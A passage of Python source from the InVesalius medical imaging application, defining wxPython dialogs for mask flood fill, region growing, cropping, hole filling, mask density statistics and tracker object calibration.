def OnSetMult(self, evt):
self.config.confid_mult = self.spin_mult.GetValue()
def OnSetIters(self, evt):
self.config.confid_iters = self.spin_iters.GetValue()
class PanelFFillProgress(wx.Panel):
def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self._init_gui()
def _init_gui(self):
self.progress = wx.Gauge(self, -1)
self.lbl_progress_caption = wx.StaticText(self, -1, _("Elapsed time:"))
self.lbl_time = wx.StaticText(self, -1, _("00:00:00"))
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.progress, 0, wx.EXPAND | wx.ALL, 5)
time_sizer = wx.BoxSizer(wx.HORIZONTAL)
time_sizer.Add(self.lbl_progress_caption, 0, wx.EXPAND, 0)
time_sizer.Add(self.lbl_time, 1, wx.EXPAND | wx.LEFT, 5)
main_sizer.Add(time_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
main_sizer.SetSizeHints(self)
def StartTimer(self):
self.t0 = time.time()
def StopTimer(self):
fmt = "%H:%M:%S"
self.lbl_time.SetLabel(time.strftime(fmt, time.gmtime(time.time() - self.t0)))
self.progress.SetValue(0)
def Pulse(self):
fmt = "%H:%M:%S"
self.lbl_time.SetLabel(time.strftime(fmt, time.gmtime(time.time() - self.t0)))
self.progress.Pulse()
class FFillOptionsDialog(wx.Dialog):
def __init__(self, title, config):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.config = config
self._init_gui()
def _init_gui(self):
"""
Create the widgets.
"""
# Target
if sys.platform == "win32":
border_style = wx.SIMPLE_BORDER
else:
border_style = wx.SUNKEN_BORDER
self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel2dcon = Panel2DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
if self.config.target == "2D":
self.panel_target.target_2d.SetValue(1)
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
else:
self.panel_target.target_3d.SetValue(1)
self.panel3dcon.Enable(1)
self.panel2dcon.Enable(0)
# Connectivity 2D
if self.config.con_2d == 8:
self.panel2dcon.conect2D_8.SetValue(1)
else:
self.panel2dcon.conect2D_4.SetValue(1)
self.config.con_2d = 4
# Connectivity 3D
if self.config.con_3d == 18:
self.panel3dcon.conect3D_18.SetValue(1)
elif self.config.con_3d == 26:
self.panel3dcon.conect3D_26.SetValue(1)
else:
self.panel3dcon.conect3D_6.SetValue(1)
self.close_btn = wx.Button(self, wx.ID_CLOSE)
# Sizer
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), flag=wx.LEFT, border=5)
sizer.AddSpacer(5)
sizer.Add(self.panel_target, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
sizer.Add(self.panel2dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
sizer.Add(self.close_btn, 0, flag=wx.ALIGN_RIGHT|wx.RIGHT, border=7)
sizer.AddSpacer(5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
self.Bind(wx.EVT_CLOSE, self.OnClose)
def OnBtnClose(self, evt):
self.Close()
def OnSetRadio(self, evt):
# Target
if self.panel_target.target_2d.GetValue():
self.config.target = "2D"
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
else:
self.config.target = "3D"
self.panel3dcon.Enable(1)
self.panel2dcon.Enable(0)
# 2D
if self.panel2dcon.conect2D_4.GetValue():
self.config.con_2d = 4
elif self.panel2dcon.conect2D_8.GetValue():
self.config.con_2d = 8
# 3D
if self.panel3dcon.conect3D_6.GetValue():
self.config.con_3d = 6
elif self.panel3dcon.conect3D_18.GetValue():
self.config.con_3d = 18
elif self.panel3dcon.conect3D_26.GetValue():
self.config.con_3d = 26
def OnClose(self, evt):
print("ONCLOSE")
if self.config.dlg_visible:
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_MASK_FFILL)
evt.Skip()
self.Destroy()
class SelectPartsOptionsDialog(wx.Dialog):
def __init__(self, config):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Select mask parts"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.config = config
self.SetReturnCode(wx.CANCEL)
self._init_gui()
def _init_gui(self):
self.target_name = wx.TextCtrl(self, -1)
self.target_name.SetValue(self.config.mask_name)
# Connectivity 3D
self.panel3dcon = Panel3DConnectivity(self)
if self.config.con_3d == 18:
self.panel3dcon.conect3D_18.SetValue(1)
elif self.config.con_3d == 26:
self.panel3dcon.conect3D_26.SetValue(1)
else:
self.panel3dcon.conect3D_6.SetValue(1)
self.btn_ok = wx.Button(self, wx.ID_OK)
self.btn_cancel = wx.Button(self, wx.ID_CANCEL)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, -1, _(u"Target mask name")), flag=wx.LEFT, border=5)
sizer.AddSpacer(5)
sizer.Add(self.target_name, flag=wx.LEFT|wx.EXPAND|wx.RIGHT, border=9)
sizer.AddSpacer(5)
sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND)
sizer.AddSpacer(5)
btn_sizer = wx.BoxSizer(wx.HORIZONTAL)
btn_sizer.Add(self.btn_ok, 0)# flag=wx.ALIGN_RIGHT, border=5)
btn_sizer.Add(self.btn_cancel, 0, flag=wx.LEFT, border=5)
sizer.Add(btn_sizer, 0, flag=wx.ALIGN_RIGHT|wx.LEFT|wx.RIGHT, border=5)
sizer.AddSpacer(5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
self.btn_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
self.target_name.Bind(wx.EVT_CHAR, self.OnChar)
self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
self.Bind(wx.EVT_CLOSE, self.OnClose)
def OnOk(self, evt):
self.SetReturnCode(wx.OK)
self.Close()
def OnCancel(self, evt):
self.SetReturnCode(wx.CANCEL)
self.Close()
def OnChar(self, evt):
evt.Skip()
self.config.mask_name = self.target_name.GetValue()
def OnSetRadio(self, evt):
if self.panel3dcon.conect3D_6.GetValue():
self.config.con_3d = 6
elif self.panel3dcon.conect3D_18.GetValue():
self.config.con_3d = 18
elif self.panel3dcon.conect3D_26.GetValue():
self.config.con_3d = 26
def OnClose(self, evt):
if self.config.dlg_visible:
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_SELECT_MASK_PARTS)
evt.Skip()
self.Destroy()
class FFillSegmentationOptionsDialog(wx.Dialog):
def __init__(self, config, ID=-1, title=_(u"Region growing"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
self.config = config
self._init_gui()
def _init_gui(self):
"""
Create the widgets.
"""
import invesalius.project as prj
# Target
if sys.platform == "win32":
border_style = wx.SIMPLE_BORDER
else:
border_style = wx.SUNKEN_BORDER
self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel2dcon = Panel2DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
if self.config.target == "2D":
self.panel_target.target_2d.SetValue(1)
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
else:
self.panel_target.target_3d.SetValue(1)
self.panel3dcon.Enable(1)
self.panel2dcon.Enable(0)
# Connectivity 2D
if self.config.con_2d == 8:
self.panel2dcon.conect2D_8.SetValue(1)
else:
self.panel2dcon.conect2D_4.SetValue(1)
self.config.con_2d = 4
# Connectivity 3D
if self.config.con_3d == 18:
self.panel3dcon.conect3D_18.SetValue(1)
elif self.config.con_3d == 26:
self.panel3dcon.conect3D_26.SetValue(1)
else:
self.panel3dcon.conect3D_6.SetValue(1)
self.cmb_method = wx.ComboBox(self, -1, choices=(_(u"Dynamic"), _(u"Threshold"), _(u"Confidence")), style=wx.CB_READONLY)
if self.config.method == 'dynamic':
self.cmb_method.SetSelection(0)
elif self.config.method == 'threshold':
self.cmb_method.SetSelection(1)
elif self.config.method == 'confidence':
self.cmb_method.SetSelection(2)
self.panel_ffill_threshold = PanelFFillThreshold(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
self.panel_ffill_threshold.SetMinSize((250, -1))
self.panel_ffill_threshold.Hide()
self.panel_ffill_dynamic = PanelFFillDynamic(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
self.panel_ffill_dynamic.SetMinSize((250, -1))
self.panel_ffill_dynamic.Hide()
self.panel_ffill_confidence = PanelFFillConfidence(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
self.panel_ffill_confidence.SetMinSize((250, -1))
self.panel_ffill_confidence.Hide()
self.panel_ffill_progress = PanelFFillProgress(self, -1, style=wx.TAB_TRAVERSAL)
self.panel_ffill_progress.SetMinSize((250, -1))
# self.panel_ffill_progress.Hide()
self.close_btn = wx.Button(self, wx.ID_CLOSE)
# Sizer
sizer = wx.GridBagSizer(2, 2)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
try:
sizer.Add(0, 0, (2, 0))
except TypeError:
sizer.AddStretchSpacer((2, 0))
sizer.Add(self.panel_target, (3, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
try:
sizer.Add(0, 0, (4, 0))
except TypeError:
sizer.AddStretchSpacer((4, 0))
sizer.Add(self.panel2dcon, (5, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
try:
sizer.Add(0, 0, (6, 0))
except TypeError:
sizer.AddStretchSpacer((6, 0))
sizer.Add(self.panel3dcon, (7, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
try:
sizer.Add(0, 0, (8, 0))
except TypeError:
sizer.AddStretchSpacer((8, 0))
sizer.Add(wx.StaticText(self, -1, _(u"Method")), (9, 0), (1, 1), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=7)
sizer.Add(self.cmb_method, (9, 1), (1, 5), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
try:
sizer.Add(0, 0, (10, 0))
except TypeError:
sizer.AddStretchSpacer((10, 0))
if self.config.method == 'dynamic':
self.cmb_method.SetSelection(0)
self.panel_ffill_dynamic.Show()
sizer.Add(self.panel_ffill_dynamic, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
elif self.config.method == 'confidence':
self.cmb_method.SetSelection(2)
self.panel_ffill_confidence.Show()
sizer.Add(self.panel_ffill_confidence, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
else:
self.cmb_method.SetSelection(1)
self.panel_ffill_threshold.Show()
sizer.Add(self.panel_ffill_threshold, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
self.config.method = 'threshold'
try:
sizer.Add(0, 0, (12, 0))
except TypeError:
sizer.AddStretchSpacer((12, 0))
sizer.Add(self.panel_ffill_progress, (13, 0), (1, 6), flag=wx.ALIGN_RIGHT|wx.RIGHT, border=5)
try:
sizer.Add(0, 0, (14, 0))
except TypeError:
sizer.AddStretchSpacer((14, 0))
sizer.Add(self.close_btn, (15, 0), (1, 6), flag=wx.ALIGN_RIGHT|wx.RIGHT, border=5)
try:
sizer.Add(0, 0, (16, 0))
except TypeError:
sizer.AddStretchSpacer((16, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
self.cmb_method.Bind(wx.EVT_COMBOBOX, self.OnSetMethod)
self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
self.Bind(wx.EVT_CLOSE, self.OnClose)
def OnSetRadio(self, evt):
# Target
if self.panel_target.target_2d.GetValue():
self.config.target = "2D"
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
else:
self.config.target = "3D"
self.panel3dcon.Enable(1)
self.panel2dcon.Enable(0)
# 2D
if self.panel2dcon.conect2D_4.GetValue():
self.config.con_2d = 4
elif self.panel2dcon.conect2D_8.GetValue():
self.config.con_2d = 8
# 3D
if self.panel3dcon.conect3D_6.GetValue():
self.config.con_3d = 6
elif self.panel3dcon.conect3D_18.GetValue():
self.config.con_3d = 18
elif self.panel3dcon.conect3D_26.GetValue():
self.config.con_3d = 26
def OnSetMethod(self, evt):
item_panel = self.GetSizer().FindItemAtPosition((11, 0)).GetWindow()
if self.cmb_method.GetSelection() == 0:
self.config.method = 'dynamic'
item_panel.Hide()
self.panel_ffill_dynamic.Show()
self.GetSizer().Replace(item_panel, self.panel_ffill_dynamic)
elif self.cmb_method.GetSelection() == 2:
self.config.method = 'confidence'
item_panel.Hide()
self.panel_ffill_confidence.Show()
self.GetSizer().Replace(item_panel, self.panel_ffill_confidence)
else:
self.config.method = 'threshold'
item_panel.Hide()
self.panel_ffill_threshold.Show()
self.GetSizer().Replace(item_panel, self.panel_ffill_threshold)
self.GetSizer().Fit(self)
self.Layout()
def OnBtnClose(self, evt):
self.Close()
def OnClose(self, evt):
if self.config.dlg_visible:
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_MASK_FFILL)
evt.Skip()
self.Destroy()
class CropOptionsDialog(wx.Dialog):
def __init__(self, config, ID=-1, title=_(u"Crop mask"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
self.config = config
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
self._init_gui()
def UpdateValues(self, limits):
xi, xf, yi, yf, zi, zf = limits
self.tx_axial_i.SetValue(str(zi))
self.tx_axial_f.SetValue(str(zf))
self.tx_sagital_i.SetValue(str(xi))
self.tx_sagital_f.SetValue(str(xf))
self.tx_coronal_i.SetValue(str(yi))
self.tx_coronal_f.SetValue(str(yf))
def _init_gui(self):
p = wx.Panel(self, -1, style = wx.TAB_TRAVERSAL
| wx.CLIP_CHILDREN
| wx.FULL_REPAINT_ON_RESIZE)
gbs_principal = self.gbs = wx.GridBagSizer(4,1)
gbs = self.gbs = wx.GridBagSizer(3, 4)
flag_labels = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL
txt_style = wx.TE_READONLY
stx_axial = wx.StaticText(p, -1, _(u"Axial:"))
self.tx_axial_i = tx_axial_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
stx_axial_t = wx.StaticText(p, -1, _(u" - "))
self.tx_axial_f = tx_axial_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
gbs.Add(stx_axial, (0,0), flag=flag_labels)
gbs.Add(tx_axial_i, (0,1))
gbs.Add(stx_axial_t, (0,2), flag=flag_labels)
gbs.Add(tx_axial_f, (0,3))
stx_sagital = wx.StaticText(p, -1, _(u"Sagital:"))
self.tx_sagital_i = tx_sagital_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
stx_sagital_t = wx.StaticText(p, -1, _(u" - "))
self.tx_sagital_f = tx_sagital_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
gbs.Add(stx_sagital, (1,0), flag=flag_labels)
gbs.Add(tx_sagital_i, (1,1))
gbs.Add(stx_sagital_t, (1,2), flag=flag_labels)
gbs.Add(tx_sagital_f, (1,3))
stx_coronal = wx.StaticText(p, -1, _(u"Coronal:"))
self.tx_coronal_i = tx_coronal_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
stx_coronal_t = wx.StaticText(p, -1, _(u" - "))
self.tx_coronal_f = tx_coronal_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
gbs.Add(stx_coronal, (2,0), flag=flag_labels)
gbs.Add(tx_coronal_i, (2,1))
gbs.Add(stx_coronal_t, (2,2), flag=flag_labels)
gbs.Add(tx_coronal_f, (2,3))
gbs_button = wx.GridBagSizer(2, 4)
btn_ok = self.btn_ok= wx.Button(p, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(p, wx.ID_CANCEL)
gbs_button.Add(btn_cancel, (0,0))
gbs_button.Add(btn_ok, (0,1))
gbs_principal.Add(gbs, (0,0), flag = wx.ALL|wx.EXPAND)
try:
gbs_principal.Add(0, 0, (1, 0))
gbs_principal.Add(0, 0, (2, 0))
except TypeError:
gbs_principal.AddStretchSpacer((1, 0))
gbs_principal.AddStretchSpacer((2, 0))
gbs_principal.Add(gbs_button, (3,0), flag = wx.ALIGN_RIGHT)
box = wx.BoxSizer()
box.Add(gbs_principal, 1, wx.ALL|wx.EXPAND, 10)
p.SetSizer(box)
box.Fit(p)
p.Layout()
sizer = wx.BoxSizer()
sizer.Add(p, 1, wx.EXPAND)
sizer.Fit(self)
self.Layout()
Publisher.subscribe(self.UpdateValues, 'Update crop limits into gui')
btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnClose)
self.Bind(wx.EVT_CLOSE, self.OnClose)
def OnOk(self, evt):
self.config.dlg_visible = False
Publisher.sendMessage('Crop mask')
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_CROP_MASK)
evt.Skip()
def OnClose(self, evt):
self.config.dlg_visible = False
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_CROP_MASK)
evt.Skip()
self.Destroy()
class FillHolesAutoDialog(wx.Dialog):
def __init__(self, title):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self._init_gui()
def _init_gui(self):
if sys.platform == "win32":
border_style = wx.SIMPLE_BORDER
else:
border_style = wx.SUNKEN_BORDER
self.spin_size = InvSpinCtrl(self, -1, value=1000, min_value=1, max_value=1000000000)
self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel2dcon = Panel2DConnectivity(self, show_orientation=True, style=border_style|wx.TAB_TRAVERSAL)
self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
self.panel_target.target_2d.SetValue(1)
self.panel2dcon.conect2D_4.SetValue(1)
self.panel3dcon.conect3D_6.SetValue(1)
self.apply_btn = wx.Button(self, wx.ID_APPLY)
self.close_btn = wx.Button(self, wx.ID_CLOSE)
# Sizer
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddSpacer(5)
sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), flag=wx.LEFT, border=5)
sizer.AddSpacer(5)
sizer.Add(self.panel_target, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
sizer.Add(self.panel2dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
spin_sizer = wx.BoxSizer(wx.HORIZONTAL)
spin_sizer.Add(wx.StaticText(self, -1, _(u"Max hole size")), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
spin_sizer.Add(self.spin_size, 0, flag=wx.LEFT|wx.RIGHT, border=5)
spin_sizer.Add(wx.StaticText(self, -1, _(u"voxels")), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
sizer.Add(spin_sizer, 0, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
sizer.AddSpacer(5)
btn_sizer = wx.BoxSizer(wx.HORIZONTAL)
btn_sizer.Add(self.apply_btn, 0)# flag=wx.ALIGN_RIGHT, border=5)
btn_sizer.Add(self.close_btn, 0, flag=wx.LEFT, border=5)
sizer.Add(btn_sizer, 0, flag=wx.ALIGN_RIGHT|wx.LEFT|wx.RIGHT, border=5)
sizer.AddSpacer(5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.apply_btn.Bind(wx.EVT_BUTTON, self.OnApply)
self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
def OnApply(self, evt):
if self.panel_target.target_2d.GetValue():
target = "2D"
conn = self.panel2dcon.GetConnSelected()
orientation = self.panel2dcon.GetOrientation()
else:
target = "3D"
conn = self.panel3dcon.GetConnSelected()
orientation = 'VOLUME'
parameters = {
'target': target,
'conn': conn,
'orientation': orientation,
'size': self.spin_size.GetValue(),
}
Publisher.sendMessage("Fill holes automatically", parameters=parameters)
def OnBtnClose(self, evt):
self.Close()
self.Destroy()
def OnSetRadio(self, evt):
# Target
if self.panel_target.target_2d.GetValue():
self.panel2dcon.Enable(1)
self.panel3dcon.Enable(0)
else:
self.panel3dcon.Enable(1)
self.panel2dcon.Enable(0)
class MaskDensityDialog(wx.Dialog):
def __init__(self, title):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Mask density"),
style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT)
self._init_gui()
self._bind_events()
def _init_gui(self):
import invesalius.project as prj
project = prj.Project()
self.cmb_mask = wx.ComboBox(self, -1, choices=[], style=wx.CB_READONLY)
if project.mask_dict.values():
for mask in project.mask_dict.values():
self.cmb_mask.Append(mask.name, mask)
self.cmb_mask.SetValue(list(project.mask_dict.values())[0].name)
self.calc_button = wx.Button(self, -1, _(u'Calculate'))
self.mean_density = self._create_selectable_label_text('')
self.min_density = self._create_selectable_label_text('')
self.max_density = self._create_selectable_label_text('')
self.std_density = self._create_selectable_label_text('')
slt_mask_sizer = wx.FlexGridSizer(rows=1, cols=3, vgap=5, hgap=5)
slt_mask_sizer.AddMany([
(wx.StaticText(self, -1, _(u'Mask:'), style=wx.ALIGN_CENTER_VERTICAL), 0, wx.ALIGN_CENTRE),
(self.cmb_mask, 1, wx.EXPAND),
(self.calc_button, 0, wx.EXPAND),
])
values_sizer = wx.FlexGridSizer(rows=4, cols=2, vgap=5, hgap=5)
values_sizer.AddMany([
(wx.StaticText(self, -1, _(u'Mean:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
(self.mean_density, 1, wx.EXPAND),
(wx.StaticText(self, -1, _(u'Minimun:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
(self.min_density, 1, wx.EXPAND),
(wx.StaticText(self, -1, _(u'Maximun:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
(self.max_density, 1, wx.EXPAND),
(wx.StaticText(self, -1, _(u'Standard deviation:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
(self.std_density, 1, wx.EXPAND),
])
sizer = wx.FlexGridSizer(rows=4, cols=1, vgap=5, hgap=5)
sizer.AddSpacer(5)
sizer.AddMany([
(slt_mask_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, 5) ,
(values_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5),
])
sizer.AddSpacer(5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.CenterOnScreen()
def _create_selectable_label_text(self, text):
label = wx.TextCtrl(self, -1, style=wx.TE_READONLY)
label.SetValue(text)
# label.SetBackgroundColour(self.GetBackgroundColour())
return label
def _bind_events(self):
self.calc_button.Bind(wx.EVT_BUTTON, self.OnCalcButton)
def OnCalcButton(self, evt):
from invesalius.data.slice_ import Slice
mask = self.cmb_mask.GetClientData(self.cmb_mask.GetSelection())
slc = Slice()
with futures.ThreadPoolExecutor(max_workers=1) as executor:
future = executor.submit(slc.calc_image_density, mask)
for c in itertools.cycle(['', '.', '..', '...']):
s = _(u'Calculating ') + c
self.mean_density.SetValue(s)
self.min_density.SetValue(s)
self.max_density.SetValue(s)
self.std_density.SetValue(s)
self.Update()
self.Refresh()
if future.done():
break
time.sleep(0.1)
_min, _max, _mean, _std = future.result()
self.mean_density.SetValue(str(_mean))
self.min_density.SetValue(str(_min))
self.max_density.SetValue(str(_max))
self.std_density.SetValue(str(_std))
print(">>>> Area of mask", slc.calc_mask_area(mask))
class ObjectCalibrationDialog(wx.Dialog):
def __init__(self, tracker, pedal_connection):
self.tracker = tracker
self.pedal_connection = pedal_connection
self.trk_init, self.tracker_id = tracker.GetTrackerInfo()
self.obj_ref_id = 2
self.obj_name = None
self.polydata = None
self.use_default_object = False
self.object_fiducial_being_set = None
self.obj_fiducials = np.full([5, 3], np.nan)
self.obj_orients = np.full([5, 3], np.nan)
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Object calibration"), size=(450, 440),
style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self._init_gui()
self.LoadObject()
self.__bind_events()
def __bind_events(self):
Publisher.subscribe(self.SetObjectFiducial, 'Set object fiducial')
def _init_gui(self):
self.interactor = wxVTKRenderWindowInteractor(self, -1, size=self.GetSize())
self.interactor.Enable(1)
self.ren = vtk.vtkRenderer()
self.interactor.GetRenderWindow().AddRenderer(self.ren)
# Initialize list of buttons and txtctrls for wx objects
self.btns_coord = [None] * 5
self.text_actors = [None] * 5
self.ball_actors = [None] * 5
self.txt_coord = [list(), list(), list(), list(), list()]
# ComboBox for tracker reference mode
tooltip = wx.ToolTip(_(u"Choose the object reference mode"))
choice_ref = wx.ComboBox(self, -1, "", size=wx.Size(90, 23),
choices=const.REF_MODE, style=wx.CB_DROPDOWN | wx.CB_READONLY)
choice_ref.SetToolTip(tooltip)
choice_ref.Bind(wx.EVT_COMBOBOX, self.OnChooseReferenceMode)
choice_ref.SetSelection(1)
choice_ref.Enable(1)
if self.tracker_id == const.PATRIOT or self.tracker_id == const.ISOTRAKII:
self.obj_ref_id = 0
choice_ref.SetSelection(0)
choice_ref.Enable(0)
# ComboBox for sensor selection for FASTRAK
tooltip = wx.ToolTip(_(u"Choose the FASTRAK sensor port"))
choice_sensor = wx.ComboBox(self, -1, "", size=wx.Size(90, 23),
choices=const.FT_SENSOR_MODE, style=wx.CB_DROPDOWN | wx.CB_READONLY)
choice_sensor.SetSelection(0)
choice_sensor.SetToolTip(tooltip)
choice_sensor.Bind(wx.EVT_COMBOBOX, self.OnChoiceFTSensor)
if self.tracker_id in [const.FASTRAK, const.DEBUGTRACKRANDOM, const.DEBUGTRACKAPPROACH]:
choice_sensor.Show(True)
else:
choice_sensor.Show(False)
self.choice_sensor = choice_sensor
# Buttons to finish or cancel object registration
tooltip = wx.ToolTip(_(u"Registration done"))
# btn_ok = wx.Button(self, -1, _(u"Done"), size=wx.Size(90, 30))
btn_ok = wx.Button(self, wx.ID_OK, _(u"Done"), size=wx.Size(90, 30))
btn_ok.SetToolTip(tooltip)
extra_sizer = wx.FlexGridSizer(rows=3, cols=1, hgap=5, vgap=30)
extra_sizer.AddMany([choice_ref,
btn_ok,
choice_sensor])
# Push buttons for object fiducials
for object_fiducial in const.OBJECT_FIDUCIALS:
index = object_fiducial['fiducial_index']
label = object_fiducial['label']
button_id = object_fiducial['button_id']
tip = object_fiducial['tip']
ctrl = wx.ToggleButton(self, button_id, label=label, size=wx.Size(60, 23))
ctrl.SetToolTip(wx.ToolTip(tip))
ctrl.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnObjectFiducialButton, index, ctrl=ctrl))
self.btns_coord[index] = ctrl
for m in range(0, 5):
for n in range(0, 3):
self.txt_coord[m].append(wx.StaticText(self, -1, label='-',
style=wx.ALIGN_RIGHT, size=wx.Size(40, 23)))
coord_sizer = wx.GridBagSizer(hgap=20, vgap=5)
for m in range(0, 5):
coord_sizer.Add(self.btns_coord[m], pos=wx.GBPosition(m, 0))
for n in range(0, 3):
coord_sizer.Add(self.txt_coord[m][n], pos=wx.GBPosition(m, n + 1), flag=wx.TOP, border=5)
group_sizer = wx.FlexGridSizer(rows=1, cols=2, hgap=50, vgap=5)
group_sizer.AddMany([(coord_sizer, 0, wx.LEFT, 20),
(extra_sizer, 0, wx.LEFT, 10)])
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.interactor, 0, wx.EXPAND)
main_sizer.Add(group_sizer, 0,
wx.EXPAND|wx.GROW|wx.LEFT|wx.TOP|wx.RIGHT|wx.BOTTOM, 10)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
def ObjectImportDialog(self):
msg = _("Would like to use InVesalius default object?")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_QUESTION | wx.YES_NO)
else:
dlg = wx.MessageDialog(None, msg,
"InVesalius 3",
